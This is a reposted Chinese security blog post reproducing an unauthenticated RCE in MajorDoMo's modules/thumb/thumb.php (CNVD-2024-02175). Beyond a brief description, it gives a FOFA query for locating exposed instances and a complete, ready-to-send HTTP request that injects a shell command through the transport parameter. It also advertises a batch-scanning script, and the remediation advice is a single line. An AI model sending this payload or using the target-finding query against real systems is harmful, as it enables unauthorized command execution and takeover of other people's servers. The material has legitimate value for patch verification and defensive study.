漏洞复现-MajorDoMo thumb.php 未授权RCE(CNVD-2024-02175)

admin 2024年4月18日01:03:46评论29 views字数 972阅读3分14秒阅读模式
免责声明

文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。如有侵权烦请告知,我会立即删除并致歉。谢谢!

:漏洞名称

MajorDoMo thumb.php 未授权RCE

:漏洞描述

MajorDoMo 是一个开源的智能家居自动化平台,允许用户集成和控制各种智能设备、传感器和系统。它提供了一个灵活的框架,让用户可以根据自己的需求创建自动化方案,从简单的定时任务到复杂的场景触发,实现智能家居的自动化控制和管理。
 该产品 modules/thumb/thumb.php接口处存在远程命令执行漏洞,未经身份验证的攻击者可利用此漏洞执行任意指令,获取服务器权限。

漏洞影响版本

MajorDoMo < 0662e5e

:网络空间测绘查询

app="MajordomoSL"

漏洞复现-MajorDoMo thumb.php 未授权RCE(CNVD-2024-02175)

漏洞复现-MajorDoMo thumb.php 未授权RCE(CNVD-2024-02175)

:漏洞复现

POC:
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1Host: User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36Accept-Charset: utf-8Accept-Encoding: gzip, deflateConnection: close
PHP 中,传入代码执行或命令执行等危险函数的参数,客户端可控,同时针对该参数没有做过滤或过滤不足,导致代码执行或命令执行。通过远程访问方式传参,就叫做RCE。

漏洞复现-MajorDoMo thumb.php 未授权RCE(CNVD-2024-02175)

:批量检测

漏洞复现-MajorDoMo thumb.php 未授权RCE(CNVD-2024-02175)

:修复建议
建议更新当前系统或软件至最新版,完成漏洞的修复。
关注【Adler学安全】公众号
发送【0416】获取批量验证脚本
发送【工具】获取渗透测试工具
发送【交流群1】加入交流群
漏洞复现-MajorDoMo thumb.php 未授权RCE(CNVD-2024-02175)

原文始发于微信公众号(Adler学安全):漏洞复现-MajorDoMo thumb.php 未授权RCE(CNVD-2024-02175)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月18日01:03:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-MajorDoMo thumb.php 未授权RCE(CNVD-2024-02175)http://cn-sec.com/archives/2664195.html

发表评论

匿名网友 填写信息